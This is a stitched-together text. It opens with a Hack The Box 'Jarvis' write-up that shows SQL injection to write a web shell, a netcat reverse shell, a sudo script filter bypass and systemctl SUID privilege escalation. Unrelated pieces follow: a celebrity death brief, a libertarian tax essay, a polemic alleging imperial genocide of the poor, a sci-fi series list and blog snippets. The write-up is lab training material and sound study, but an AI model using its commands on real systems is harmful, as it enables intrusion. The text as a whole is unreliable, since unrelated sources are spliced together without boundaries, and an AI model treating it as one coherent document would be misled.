Jarvis – HTB WriteUp Jarvis – HTB WriteUp Note: This is my first HTB writeup, so opinions are more than welcome. Jarvis just retired today. Even though this is a medium box, I learned a lot from solving it, especially about systemctl and how I can abuse it to gain root privileges. Its IP address is and I added it to /etc/hosts as jarvis.htb to make accessing the machine easier. Without further ado, let’s jump right in! Scanning & Web App Enumeration I always make a quick ‘light’ scan with nmap so I can get to work quickly and a full one to see if there are any uncommon open ports. In this case, the ligh one was enough to get the initial foothold: root@fury-battlestation:~/htb/blog/jarvis# nmap -sV -O jarvis.htb -oN scan.txt Starting Nmap 7.80 ( ) at 2019-11-05 08:57 EST Nmap scan report for jarvis.htb ( Host is up (0.48s latency). Not shown: 998 closed ports 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.8 - 3.11 (94%), Linux 4.8 (94%), Linux 4.4 (94%) Network Distance: 2 hops Nmap done: 1 IP address (1 host up) scanned in 153.16 seconds OpenSSH seemed to be up-to-date, so I decided to check port 80 for vulnerabilities. The site looked like it was custom-made, so I decided to explore it more. After playing around for a bit, I discovered an interesting URL: Do you see the LFI? I did, too, but it turns out that was an SQL injection 🙂 A simple, working payload could be I wanted to do the SQL injection manually, so I started ‘exhaustively searching’ for the number of columns. The SELECT statement worked with 7 entries, so the table probably had the same number of columns: Now that we have a working SQL SELECT statement, we can insert anything in the results. I wanted to write a simple PHP shell in a file on the server and then use it to get a reverse shell. I tried writing using the INTO OUTFILE statement, and it worked. Also, since the target is most probably running Linux, I tried to write the file in the default webroot directory (/var/www/html): There was no output, which is normal because the SQL engine saves the query output to a file instead of passing it on to PHP. We can test that the query worked by trying to run a simple command on the server (whoami): One thing that I learned from the OSCP course is to only value reverse shells, so I spawned one using netcat: It’s also a good idea to upgrade the shell to a tty: root@fury-battlestation:~/htb/blog/jarvis# nc -nvlp 443 listening on [any] 443 ... connect to [] from (UNKNOWN) [] 50616 Once I had a shell, I starter enumerating the machine. One thing that seemed odd was the sudo permission: www-data@jarvis:/var/www/html$ sudo -l sudo -l Matching Defaults entries for www-data on jarvis: env_reset, mail_badpass, User www-data may run the following commands on jarvis: (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/ The www-data user is allowed to run /var/www/Admin-Utilities/ as pepper without providing any password. I thought this might be the path to privesc, and I was right! I first tried to read the source code of the script: www-data@jarvis:/var/www/html$ cat /var/www/Admin-Utilities/ cat /var/www/Admin-Utilities/ #!/usr/bin/env python3 from datetime import datetime import sys import os from os import listdir import re def show_help(): * Simpler - A simple simplifier ;) * * Version 1.0 * Usage: python3 [options] -h/--help : This help -s : Statistics -l : List the attackers IP -p : ping an attacker IP def show_header(): _ _ ___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _ / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | | \__ \ | | | | | | |_) | | __/ |_ | |_) | |_| | |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, | |_| |_| |___/ What caught my attention was the exec_ping function, because it uses os.system() to call ping, which is VERY unsafe: def exec_ping(): forbidden = ['&amp;', ';', '-', '`', '||', '|'] command = input('Enter an IP: ') for i in forbidden: if i in command: print('Got you') os.system('ping ' + command) The function is called when the program is being run with the -p switch. This means that we can execute any command given that we bypass the filter (our payload shouldn’t contains any character present in the forbidden array). My solution was pretty straightforward, but I’m not sure it was the intended one. We can use $(command) to execute a command, however, I found it easier to store the command into a file and execute it as a script, as / is not a blacklisted character. www-data@jarvis:/var/www/html$ echo 'nc 444 -e /bin/bash' > /tmp/ <c 444 -e /bin/bash' > /tmp/ www-data@jarvis:/var/www/html$ chmod +x /tmp/ chmod +x /tmp/ www-data@jarvis:/var/www/html$ echo '$(/tmp/' echo '$(/tmp/' www-data@jarvis:/var/www/html$ echo '$(/tmp/' | sudo -u pepper /var/www/Admin-Utilities/ -p <do -u pepper /var/www/Admin-Utilities/ -p _ _ |_| |_| |___/ Enter an IP: The program hangs because the script needs to terminate before the ping command is executed. A reverse shell connected on port 444, so I added my SSH public key in the ~/.ssh/authorized_keys file and connected using SSH: root@fury-battlestation:~/htb/blog/jarvis# ssh [email protected] Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 the exact distribution terms for each program are described in the permitted by applicable law. Last login: Tue Nov 5 11:00:02 2019 from pepper@jarvis:~$ wc user.txt 1 1 33 user.txt We got user! I won’t display the file’s contents, but I can tell you that the proof starts with 2a 🙂 Exploiting systemctl After getting the user flag, I started enumerating the machine again. While listing the SUID binaries, I noticed systemctl on the list: pepper@jarvis:~$ find / -perm -4000 2> /dev/null This is odd because systemctl should be ran as the current user only. Instead, we can run it as its owner, root: pepper@jarvis:~$ ls -la /bin/systemctl -rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl systemctl is used to turn Linux services on and off. The basic idea of exploitation is to create a new service (which is just a file, as you’ll see in a moment) and start it. Because systemctl is running as root, the service will be started as root. Note: I didn’t come up with this method myself; I found it on gtfobins. First, I created a service file using the following commands: pepper@jarvis:~$ echo '[Service]' > yakuhito.service pepper@jarvis:~$ echo 'Type=oneshot' >> yakuhito.service pepper@jarvis:~$ echo 'ExecStart=/bin/bash /tmp/' >> yakuhito.service pepper@jarvis:~$ echo '[Install]' >> yakuhito.service pepper@jarvis:~$ echo '' >> yakuhito.service I reused the /tmp/ script, because I was now controlling the box via an SSH session and port 444 wasn’t used anymore. The next step was to enable (or install) the service: pepper@jarvis:~$ systemctl enable /home/pepper/yakuhito.service --now Created symlink /etc/systemd/system/ → /home/pepper/yakuhito.service. Created symlink /etc/systemd/system/yakuhito.service → /home/pepper/yakuhito.service. The shell hung and a reverse shell connected on port 444. listening on [any] 444 ... connect to [] from (UNKNOWN) [] 49288 root@jarvis:/# whoami && id && hostname whoami && id && hostname root@jarvis:/# wc /root/root.txt wc /root/root.txt 1 1 33 /root/root.txt Again, I will not put the entire flag here, but I will tell you that it starts with d4 😉 If you liked this post and want to support me, please follow me on Twitter 🙂 Until next time, hack the world. yakuhito, over. Leave a Reply
global_01_local_0_shard_00002368_processed.jsonl/40935
BREAKING: Luke Perry Has Died RIP TMZ is reporting that that actor Luke Perry, who rose to fame on “Beverly Hills 90210” is dead. He died after suffering a massive stroke last week. Big Mark Clark Big Mark Clark Content Goes Here
global_01_local_0_shard_00002368_processed.jsonl/40958
Fair Income Taxation, 1913-Style With the latest debate about “fair” tax policy coinciding with the 99th anniversary of the federal income tax, it’s interesting to look back at what Congress considered fair when it all began. The income tax was originally sold to the American people as a means of “soaking the rich”—a phrase that seems refreshingly candid when compared to today’s cushioned yet calculated talk of asking the rich to “pay their fair share.”  While many early 20th-century politicians shared the feelings of our founders and resisted the notion of a direct federal tax on the product of a citizen’s work or investment, their fear of being tarred as protectors of the wealthy outweighed their conviction and the income tax was unleashed in 1913. Official White House portrait of William Howar... President Taft: Champion of the Income Tax The original income tax, which Democrats defended as “the fairest and cheapest of all taxes”, bore very little resemblance to the version confronting individuals and businesses today. Reviewing the first IRS Form 1040, four attributes are particularly striking: • It was far simpler.  The instructions for the original 1040 fit on just one page, compared to 100 today.  Meanwhile, the full tax code spanned 400 pages, while today’s leviathan consumes more than 72,000. • Hardly anyone paid it.  While the relentless growth of the federal government would force it to eventually engulf a huge swath of the population, the original income tax focused on only the most prosperous Americans.  Thanks to a generous personal exemption, only those with taxable income greater than today’s equivalent of $67,000 were snared by it, which meant 98 or 99% of Americans kept everything they earned from either their own work or from their savings and investments. • Those who paid did so at much lower rates than today.  The original income tax applied a mere 1% rate on income all the way up to $452,292 in today’s dollars, according to the Tax Foundation.  Like our current code, the 1913 version applied higher rates to higher incomes—but topped out at just 7% on income over the equivalent of  a whopping $11.3 million today.  In stark contrast, there are many politicians in 2012 who think it’s perfectly reasonable for the federal government to lay claim to a full third of a citizen’s income above a far lower threshold than that. • Received dividends were exempt from income tax.  At the outset, the income tax avoided what many consider an unjust aspect of today’s tax code:  the double-taxation of corporate dividends.  That is, dividends are paid out of after-tax profits, and those same dividends are taxed again when received by the investing shareholder.  Those arguing today that dividends should be taxed at the same rates as ordinary income would gain allies if they also embraced corporate deductions for dividends— preventing our gluttonous government from taking two bites from the same profit. Imagine if, instead of proposing the far less invasive original version, politicians in 1913 tried to implement the income tax as we now know it.  Starting from a fresh slate, would Americans have considered it a reasonable proposal?    Certainly not.  And yet today, after nearly a century over which the income tax has insidiously expanded its intrusion into our economy, our politics and our lives, millions of Americans who never knew a world without the income tax accept its continuation as inevitable.  Without consciously doing so, they surrender to what Milton Friedman called “the tyranny of the status quo,” where existing policies are fiercely guarded from change by politicians, bureaucrats and those who directly benefit from those policies. Reconsidering the Income Tax That said, Americans’ tolerance of the income tax could be on the cusp of a steep decline.  Spurred by a growing appreciation of the income tax’s many inherent flaws, legislation to repeal it and replace it with the FairTax—a national sales tax on new goods and services—has attracted 66 co-sponsors in the House of Representatives and eight in the Senate, along with the support of Libertarian presidential candidate Gary Johnson. Of course, the most prominent voice calling for income tax repeal is Republican presidential hopeful Ron Paul, who would accomplish his goal via passage of the Liberty Amendment.  Like his stand on most issues, Paul’s position on the income tax seems firmly rooted in principle, not politics.  Indeed, when Paul recently discussed the basic concept of rights, he summarized it by saying, “Rights mean you have a right to your life, you have a right to your liberty (and) you should have a right to keep the fruits of your labor.” Ron Paul Like many of his other principled stances, Paul’s strident opposition to the income tax prompts some observers to dismiss him as extreme.  Perhaps, however,  what’s truly extreme is the notion that our government should have a presumptive claim on the income of its individual citizens. If Ron Paul’s growing popularity is any indication, more and more Americans are reaching the conclusion that the “fairest” approach to income taxation is to have no income taxation at all. Brian McGlinchey is principal at Liberty Messaging—a communications firm serving libertarian causes. He is the founder of 28Pages.org and a contributor at The Libertarian Institute.
global_01_local_0_shard_00002368_processed.jsonl/40962
Imperialism ‘Genocides the Poorest of the Poor’ By James Petras Libya 360° ‘The war and its results have turned Yemen back a hundred years, due to the destruction of infrastructure . . . especially in the provinces of Oden, Dhalea and Taiz.’ Izzedine al-Asbali Yemeni Human Rights Minister ‘Yemen is devastated. There are no roads, water or electricity. Nobody’s left but thieves.’ A resident of Sana (Yemen) The Euro-American and Japanese ruling classes, as well as their collaborators in the Afro-Asian and Latin American countries, have accumulated vast profit. This has occurred through a complex stratified system re-concentrating the world’s wealth through: • 1. The exploitation of labor in the First World (North America and Western Europe) • 2. super-exploitation of labor in the Second World (China, ex-USSR) • 3. dispossession of peasants, native communities and urban dwellers to grab resources, land and real estate in the Third World • 4. wars of genocide against the poorest of the poor in the ‘Fourth World’ Besides all the forms of brutal exploitation and dispossession, which enrich the Euro-US ruling classes, by far the most sinister and threatening to humanity is the concerted worldwide effort to literally exterminate the poorest-of-the poor, the hundreds of millions of people no longer essential for the accumulation and concentration of imperial capital today. This essay will begin by mapping the genocidal wars against ‘the wretched of the earth’, identifying the geography of genocide, the countries and subjects under attack, and the trajectory, which has been chosen and executed by the leaders of the Euro-American regimes. Then we will examine the reason for genocide within the dynamics and forms of contemporary capitalism. In particular, we will develop the genocide hypothesis: that imperial genocide of the poorest of the poor is a deliberate policy to reduce the growing surplus labor, which is no longer needed or wanted for wealth accumulation but is increasingly feared as a potential political threat. In the last section, we will discuss how the ‘wretched of the earth’ are responding to this policy of imperial genocide and what is to be done. Mapping Genocide Against the Poorest of the Poor It is no coincidence that the most violent assaults and invasions by the Euro-American powers have taken place against the poorest countries in each region of the world. In the Western hemisphere, the Euro-US regimes have repeatedly invaded the absolutely poorest country, Haiti, overthrowing the popularly elected Aristide government, decimating the population via a cholera epidemic spread by UN mercenary ‘peace-keepers’, killing tens of thousands of poor Haitians and rounding up thousands of protestors. The occupation continues. Honduras, the second poorest country in the region, experienced a US-backed coup d’état deposed their recently elected president and imposed a terrorist puppet regime, which regularly assassinates dissidents and landless rural workers. Peasants are dispossessed; the economy and society are in shambles with tens of thousands of Hondurans (especially children) fleeing the violence. Today, the Euro-American powers actively support the absolutist regime of Saudi Arabia as it bombs and slaughters thousands of Yemeni civilians and resistance fighters. Yemen is the poorest country in the Gulf region. In South Asia, the US invaded and occupied Afghanistan; its coalition of puppets and NATO allies have massacred and displaced millions of poor farmers and civilians. Afghanistan is the poorest of the poor countries in the region. In Africa, the Euro-American powers and their local collaborators have invaded, bombed and occupied Somalia, Chad and Mali – among the poorest of sub-Sahara countries. After the US-NATO campaign of destruction against Libya, 1.5 million sub-Saharan Africans and black citizens of Libya lost their stable employment and became the victims of ethnic slaughter. Their attempts to escape the violence and starvation by fleeing to Europe are blocked by the leading powers (the same powers that destroyed the Libyan economy and society). Those, who do not drown in their flight, are detained and returned to their devastated countries and early deaths. In Western Europe, millions of Greeks, Spaniards and Portuguese, inhabiting the poorest countries in the region, have faced massive job losses, widespread impoverishment and spiraling suicides – all induced by austerity programs designed to pillage their economies and enrich their Euro-US creditors. In the United States, 1.5 million black (mostly male) Americans, are ‘missing’ – products of early death, industrial-scale incarceration and police assassinations. American Indian communities are subject to depredations and early death from the policies of the Federal and State governments. Their lands have been handed over to mining (and now fracking) to serve the interests of the mining and agro-business elite. Throughout the US Latino agricultural workers are increasingly viewed as ‘expendable’ with technology and the effects of global climate change (such as the severe drought in California) depriving them of livelihood. In the Levant, Palestinians, now the poorest of the poor and the most disenfranchised, face continued Israeli land grabs, pillage and violence in the West Bank and genocidal attacks in Gaza. Iraq and Syria have experienced millions of deaths and displacements, reducing previously prosperous, educated and sophisticated multi-ethnic populations into impoverished, uprooted and desperate people deliberately driven backwards to tribal loyalties. Why Imperialism ‘Genocides the Poorest of the Poor’ With the exception of Iraq and Syria, all of the violated countries have been poor in resources and markets, and possess large unskilled labor. The people are targeted and savaged because they no longer serve as ‘labor reserves’ – they are now excess-surplus labor – in Nazi racial hygiene terminology, they have become ‘useless mouths to feed’. This has intensified as crisis engulfs the West and the least productive sectors of capitalism, finance, real estate and insurance (FIRE), have become the leading sectors of capital. ‘Cheap labor’ is less needed, least of all overseas labor from conflictual regions. The ‘poorest of the poor’ countries under attack lack rich resources ripe for plunder; their populations do not exist among the priorities of the multi-national bankers – except when seen as ‘obstacles’. In the colonial past, sectors of these populations would have been recruited by imperial countries to submit, obey and serve as imperial mercenaries or coolie labor. They would have been transported and employed by empire for ‘dirty’, dangerous and poorly paid jobs in other colonized countries – like the millions of Indians scattered throughout the former British Empire. Today, such coolies have no value. The genocidal nature of the wars against the ‘poorest of the poor’ is best demonstrated by the actual targets and primary victims of these wars: Millions of civilians, families, women, children and heads of households have suffered the worst. These ‘targets’ represent the most stable and essential elements responsible for family reproduction and security. The ‘poorest of the poor’ communities are being destroyed. Genocidal bombing has overwhelmingly targeted the essential factors for survival: cohesive households, communal settings, subsistence food growing regions and access to clean water. Therefore, it should come as no surprise that marriage ceremonies and traditional social gatherings have been ‘mistaken targets’ of missiles and drone strikes. Despite the denials from the White House, the geographic extent and nauseating number of such attacks demonstrate that according to the ‘genocide hypothesis’ there is ‘nowhere to hide’: The targeted populations will have no marriage celebrations, no social life, no increase in children among the poorest of the poor, no protection for the elders, no social fabric and no communal organizations – there will be no survival networks left for the superfluous of empire. The ‘genocide hypothesis’ underlies the practice of ‘total war’. The practice includes massive attacks on non-military targets (‘Shock and Awe’) and the use of high tech weaponry to target collectives of the poorest of the poor – repeatedly, over long periods of time and wide geographic regions. If, as the apologists of genocidal wars claim, the bombings of weddings and slaughter of school children are ‘collateral’ in the ‘Global War on Terror’ why are they happening everywhere in the fourth world and virtually everyday? The genocide hypothesis best explains the data. Even the terminology and claims made by imperialist experts regarding their weapons systems support the genocide hypothesis. These weapons, we are told, are ‘intelligent, precise and highly accurate’ in targeting and destroying ‘the enemy’. By their own admission, then, the poorest of the poor have become ‘the enemy’, as imperial weapons makers support ‘intelligent’ genocide with ‘precision’. When liberals and leftists criticize how imperial drone strikes kill civilians, instead of ‘armed terrorists’, they are missing the essential point of the policy. The prime purpose of the wars and the imperial weapons of mass destruction is to kill the largest number of the very poorest in the shortest time. No member of the financial-high tech capitalist class has ever complained about the mass killing of the ‘poorest of the poor’ anywhere or at any time because the victims are, for the purpose of accumulating imperial profit and concentrating wealth superfluous. The poorest don’t figure into the formulae of profit and productivity; they don’t ‘make or take’ markets. On the other hand, their continued existence is a potential liability. They are aesthetically unappealing on the outskirts of luxury resorts. To the rich, they represent a desperate criminal element and they may pose a real or imagined ‘terrorist’ threat. For these reasons, the rich would ‘prefer’ that they would quietly cease to exist, or if the warlords have to dispose of them, the world will be a safer and more attractive place to accumulate wealth. ‘Let them kill each other, as they have done for millennia’, the empire piously opines and the bankers and their high tech allies can use their military and mercenaries without soiling their own hands. The elite ignore the mass emiseration while the militarists bomb ‘the problem’ out of existence. Today genocide occurs in once vibrant living and working communities, not hidden in ‘concentration camps’. The secret ovens and gas chambers have been replaced by an ‘open range’ of incendiary weapons that end lives, burn neighborhoods and workshops, devastate livestock and crops. Those who survive the bombing are starved, enclosed, malnourished and inflicted with disease. Eminent doctors tell us that the misery is ‘self-inflicted’ and that the poorest of the poor are ignorant and lack healthy habits. Recurrent epidemics from HIV to cholera to Ebola are quintessential ‘4th world diseases’. Even though the Caribbean had not seen cholera for over a century, its introduction into Haiti via the bowels of imperial mercenary troops (UN peacekeepers from Nepal) was blamed on the Haitians’ lack of access to clean water! Not since the small pox blankets passed out by the US Army to freezing Native Americans in their concentration camps of the 19th century have we heard such apologists for genocide! The truth about genocide is that all this is known, repeatedly documented and forgotten. White workers in the First World cannot even register these ‘facts’ under their own noses, let alone express any form of solidarity. Imperial genocide, committed by proactive militarists and ‘passive’ rich elites, are no secret even if they deny their complicity. The key word here is ‘mission’. ‘Mission Accomplished’ was the celebratory banner over the total destruction of Iraq. The warlords claim rewards for successfully completing ‘the mission’. Yemenis are dying under US-supplied Saudi bombs; Somalis are scattered in tens of thousands of tents to the four corners of the earth; Haitians continue to enjoy the ‘gift of cholera’ from UN ‘peacekeepers’ and rot in massive open air prison-slums – their leaders imprisoned or assassinated. The Poorest of the Poor Respond In the face of genocide and their irrelevance to the profit motive of modern high tech and finance capital, the poorest of the poor have chosen multiple responses: (1) Mass out-migration, preferable to the First World, where they won’t be bombed, raped or starved as they had been at ‘home’; (2) Internal migration to the cities, under the illusion of an ‘urban safe haven’ when in fact their concentration in slums makes it easier for the bombers; (3) return to the countryside and subsistence farming or the mountains and subsistence herding, but the missiles and drones relentlessly follow them; (4) mass flight to a neighboring country where the local gendarmes will ‘herd’ them into camps to rot and (5) finally resistance. Resistance takes various forms: There are spontaneous upheavals when the scope of abuse exceeds all endurance. This form involves attacking the local collaborators and gendarmes and authorities and sacking food warehouses. Such action burns briefly and dies (many times literally). Some choose to join armed resistance bands, including gangs of brigands, political ethno-religious rivals and terrorists who retaliate against authors of their genocide and its collaborators with their own version of justice and material and celestial rewards. Total war from above and the outside breeds total war from the inside and below. The rebellion of the ‘wretched of the earth’ in the 21st century is far different from that portrayed by Franz Fanon in the middle of the last century. Fanon described a revolt against colonialism and neo-colonialism. Today the revolt is against deracination and genocide. During colonialism, the ‘wretched’ needed to be subdued to better exploit their labor and resources. Today, the ‘poorest of the poor’ are superfluous to empire and thus the policy of genocide. The current world war between the classes has become a war between exterminators and those who would fight to survive!
global_01_local_0_shard_00002368_processed.jsonl/40979
Show Mobile Navigation Books | Top 15 Science Fiction Book Series Jamie Frater . . . Comments Nothing is better than finishing a brilliant science fiction novel knowing that it is only the first in a series. Some of the greatest minds in sci-fi have used the series format to create complex and thrilling universes for their story characters to exist in, while others have created dystopian (and utopian) future environments on earth. This list takes the best of the science fiction series genre and attempts to rank them – a difficult (and obviously subjective) task. For your reading pleasure, here are the 15 greatest science fiction book series. Vorkosigan Saga Lois McMaster Bujold The bulk of the Vorkosigan Saga concerns Miles Vorkosigan, a disabled aristocrat from the planet Barrayar whose entire life is a challenge to the prejudices of his native planet against “mutants”. The novels The Vor Game, Barrayar, and Mirror Dance each won the Hugo Award for Best Novel, while Falling Free, Memory, and A Civil Campaign were nominated but did not win. The series makes travel between star systems possible through the use of wormholes (spatial anomalies that exist in five spatial dimensions) – enabling instantaneous travel. The inhabited systems are known collectively as the Wormhole Nexus. Wikipedia | Amazon The Book of the New Sun Gene Wolfe Written by Gene Wolfe, this four-part novel is about Serverian, a journeyman torturer who shows mercy to his victim by allowing her to commit suicide to avoid further suffering. As a result of this act he is exiled from the torturers guild Seekers for Truth and Penitence. The series belongs to the Dying Earth subgenre – a type of science fiction or fantasy set in a far distant future in which the Sun is dying. Wolfe uses a lot of allegory in his series, with Severian being identified as a Christ/Apollo figure. It is his destiny to revive the sun and, thereby, save the earth. Wikipedia | Amazon Hyperion Cantos Dan Simmons Hyperion Pair 1 Simmons’ Cantos is one of the most well known science fiction series of the last two decades. It is set in the far future and focuses heavily on plot and story development, giving a much lesser role to technical detail. It would be considered soft science fiction and is often described as “space opera”. Of the four novels in the series, Hyperion received the Hugo Award for best Novel and The Fall of Hyperion was nominated for the Nebula Award for best novel. Hyperion is home to the Time Tombs, large artifacts that allow people to travel back and forth in time. The region where the tombs are found is also the home of the Shrike, a menacing being that appears throughout the series. Wikipedia | Amazon The Space Odyssey series Arthur C Clarke This is, perhaps, the most well known of the series on this list due to the commercial success of the film 2001, a Space Odyssey. The whole series was originally sparked off by a short story by Clarke, which he later evolved in to a full length novel in conjunction with the production of the movie by Stanley Kubrick. The series combines science fiction and metaphysics. Because the stories and settings of the various books and films diverge, Clarke stated that the continuity of the series represents occurrences in a set of parallel universes. Wikipedia | Amazon The Culture Iain Banks The Culture is an anarchistic, socialistic, and utopian society set in the future. It is a “post-scarcity” society – meaning that it is is set in a time in which man has overcome all of the problems of poverty and need in the world – as well as eradicating death and disease. It is a totally egalitarian state, requiring no use of force or compulsion except when necessary for the protection of others. The novels deal mostly with people living on the fringes of this society – diplomats, spies, and mercenaries – those who do the dirty work of the culture. Wikipedia | Amazon Rama Series Arthur C Clarke, Gentry Lee Rendezvous with Rama (the first in the Rama series) was published in 1972. It is set in the 22nd century when a thirty mile long cylindrical object passes through the solar system of Earth. It is revealed to be an alien starship and man decides to intercept it in order to unlock its mysteries. This is a brilliant book and it was accordingly given both the Hugo and Nebula awards upon its release. It is considered to be one of the cornerstones of Clarke’s total output and is seen as a science fiction classic. Under pressure to produce a sequel, Clarke teamed up with Gentry Lee to write the remainder of the series. Lee did the majority of the work and Clarke merely looked over and edited the writing. Wikipedia | Amazon Dune Series Frank Herbert The Dune universe (Duniverse) is the political, scientific, and social setting of this six book series of science fiction meets fantasy books. The first book (Dune) was extremely popular and was ultimately adapted in to a film by David Lynch. It was also televised as a miniseries in 2000, and in 2003, its first two sequels also appeared as miniseries. The universe is set in the distant future of man and it has a history stretching some 16,000 years, covering considerable changes in political, social, and religious structures. Wikipedia | Amazon Heechee Saga Ferderik Pohl Frederik Pohl’s HeeChee are an extremely advanced star traveling race that explored Earth’s solar system millennia ago, disappearing without a trace before man began space exploration. They originated as a plot device to allow Pohl to give a plausible reason for humans to make the effort of colonizing the inhospitable planet Venus. In the book of the series “The Merchants of Venus”, the Heechee are nowhere to be found, but the discovery of tunnels beneath the surface of the planet proves that they were there. Wikipedia | Amazon The Hitchhiker’s Guide to the Galaxy Douglas Adams 2005 The Hitchhickers Guide To The Galaxy Wallpaper 005 The Hitchhiker’s Guide to the Galaxy is a comedy in science fiction form. It was originally a radio broadcast on BBC Radio 4 which was later adapted in to various other formats. The first series was six self-contained episodes each ending with the planet earth being destroyed in a different way. When Adams was writing the first episode he realized that he needed an alien on the planet to provide context – he settled on making the alien a roving researcher seeking the book “The Hitchhiker’s Guide to the Galaxy”. Wikipedia | Amazon Larry Niven Ringworld was a the 1970 winner of both the Hugo and Nebula awards. It is considered to be one of the classics of Science Fiction literature. The book was followed by three sequels. The series is set around the year 2855. Two humans and two aliens explore a mysterious “ringworld” – a large artificial ring shaped structure surrounding a star. It is set in a very technologically advanced universe which allows for instant teleportation. The ring has a habitable flat inner surface of an area equal to roughly 3 million earth-sized planets. Wikipedia | Amazon Ender’s Game Series Orson Scott Card This series started with a small novel “Ender’s Game” which was later expanded in to a full sized novel of the same name. It now consists of nine novels, 10 short stories, and two yet to be published books. The first two novels in the series both won the Hugo and the Nebula awards and are considered to be among the most influential science fiction books of the 1980s. The main character, Andrew “Ender” Wiggin, is a child soldier trained in a battle school to be a future leader of Earth. Wikipedia | Amazon Future History Series Robert Heinlein Heinlein’s Future History described the future of the human race from the middle of the 20th century to the early 23rd century. He wrote most of the stories early in his career (between 1939 and 1941, and 1945-1950). The series primarily defines a core group of stories, but Heinlein scholars now agree that some books not included by Heinlein also belong in the series. Two of the better known books included in the series are The Man Who Sold the Moon, and Time Enough for Love. A complete list of the included books can be found on Wikipedia. Wikipedia | Amazon Barsoom Series Edgar Rice Burroughs Barsoom is a fictional version of the planet Mars invented by Burroughs for his series of stories. In 1911 he began his career as a writer with A Princess of Mars. Several sequels followed, developing the planet in much greater detailer. A Princess of Mars was probably the first 20th century fictional work to feature a constructed language. Its influence can be clearly seen in both the Star Trek and Farscape franchises. While many of the tales appear to be rather dated today, they were extremely innovative in their time and they helped to inspire serious interest in Mars and space exploration. Wikipedia | Amazon Lensman Series E E Smith The Lensman series by E E Smith introduced many innovative concepts in to the science fiction genre. It was also a runner up for the Hugo All Time Best Series award. The series begins with Triplanetary two billion years before the present day and it is based in a universe with few life forms. The peaceful Arisian race understand life and life-forces in a way that no other race does, and as a result they create the lens – an object which gives its wearer a variety of special mental capabilities including those needed to enforce the law on alien planets and to bridge the communication gap between different life forms. Wikipedia | Amazon Foundation Series Isaac Asimov 228 Foundationtrilogy The Foundation Series is an epic series of books written over a span of 44 years. It contains 7 volumes all closely linked (though they can be read separately). The term “foundation series” is also sometimes used to include the Robot Series and the Empire Series, all of which are set in the same fictional universe (though in earlier times). Including these other series, there are a total of 15 novels and dozens of short stories. The Foundation Series won the 1965 All Time Best Series Hugo award. The premise of the series is that a scientist (Hari Seldon) develops a branch of mathematics known as psychohistory in which the future can be predicted due to mass behavior of humans. Wikipedia | Amazon Jamie Frater Read More: Twitter Facebook Instagram Email
global_01_local_0_shard_00002368_processed.jsonl/41016
April 11th, 2008 straight to hell Would we? YOU BETCHA!! Pic by Deadro, found in fantasygoat. The 1936 Summer Olympics (officially known as the Games of the XI Olympiad) were held in 1936 in Berlin, Germany. Although the bid was won before the Nazi Party gained power in Germany, some leaders in the government saw the Olympics as an opportunity to promote their Nazi ideology. Hitler was convinced by Joseph Goebbels to allow the games to take place in Germany. Hitler used the Olympics as a tool for propaganda. Film-maker Leni Riefenstahl, a favorite of Hitler, was commissioned by the International Olympic Committee to film the Games. The film, titled Olympia, originated many of the techniques now commonplace to the filming of sports. By allowing only members of the "Aryan race" to compete for Germany, Hitler further promoted his ideological belief of racial supremacy. Embedded Engineers are a dying breed. So, does the United States have a shortage of engineers? Well, if we are talking about engineers who understand how computers work, then I’m afraid we do. I can understand not wanting to get into the nitty-gritty of bus transceiver logic, etc. Some folks like that level of design, and I’m happy that we have them. But, as embedded systems developers, we must all understand the effects of memory management units (MMUs), caches, instruction pipeline flushes, scheduling policies, context switches and the like, to be effective in creating working embedded systems. As for today’s CS programs, it seems that long gone are the computer architecture classes, writing code in assembly language (or even C at this point) and engineering software economics. In fact, a large number of CS majors apparently believe that everything can be implemented in a virtual machine and that both memory and central processing unit (CPU) cycles are infinite. Based on a typical x86-centric desktop computer view, these observations are perhaps less unrealistic. However, the net result of this perspective is the code bloat we perceive in certain operating systems and applications. Certainly, our “lean and mean” perception of what it means to be an embedded system is not consistent with the infinite CPU and memory viewpoint. The educators and curricula developers are quick to claim that they are simply teaching their students what the industry is demanding. This is often based on a quick look at the local want ads or a search of employment sites on the Internet. Java, PHP and HTML developers all seem to be in high demand. However, these are again skill sets that are easily outsourced. Proximity to the hardware and the hardware designers as well as test equipment is precisely why it is so much harder to outsource embedded development jobs. Embedded engineering requires understanding both circuits and compilers, and as the article says, that kind of cross-disciplinary teaching is not done in modern US colleges. The only way I can think of to resurrect embedded engineering is to get serious about teaching mechatronics (i.e., robotics) in schools. You'll be forced to learn a little mechanical, electrical and software engineering if you want to build robots. In this, Dean Kamen is far ahead of the rest of us. Beating down the Concurrency demon. In short, the easy pickin's have long gone, and now we need complex tools and complex coding styles to get more performance from more cores using the existing languages. While I think we can go farther with what we have, it's time to get serious about exploring serious language changes. Somewhere, Out There, There's a Way to write large programs without me having to sweat out Every Bloody Little Detail about how my parallel program communicates internally. Screw Java: I got a JVM with a super GC, fantastic JIT and decent concurrent libraries; it can do loads more stuff than just run Java. I got reasonable OS's and an ever-growing mountain of (parallel) CPU cycles. Isn't there Some Way to beat back the Concurrent-Programming Demon? Larger then a grizzly bear one and a half times over, Andrewsarchus was the most sophisticated killing machine since the Velociraptor. It was the largest mammalian terrestrial carnivore in the history of life on Earth. It was almost 15-feet long, and the first three feet of that was teeth. It was quick, agile and even had a pretty sophisticated brain for its era. That finely-tuned killing machine's closest modern relative? A sheep or goat. The Andrewsarchus' Order, Mesonychia, has close ties to the modern Order Artiodactyla, of which Ovis aries and Capa aegagrus are a modern example of. Yes, that pitiful thing that smelled like its own feces when you awkwardly encountered it at that petting zoo is all that's left of the most powerful mammalian predator in history. The Ice Age essentially wiped Andrewsarchus out of the mammalian gene pool. All that's left are these warm, fuzzy remnants. This includes what has to be the utter bottom rung of evolutionary failure, the fainting goat. Nice job, evolution. Jan 2008: Previous world record for crude oil production is broken. The EIA’s newest International Petroleum Monthly shows World C+C production for 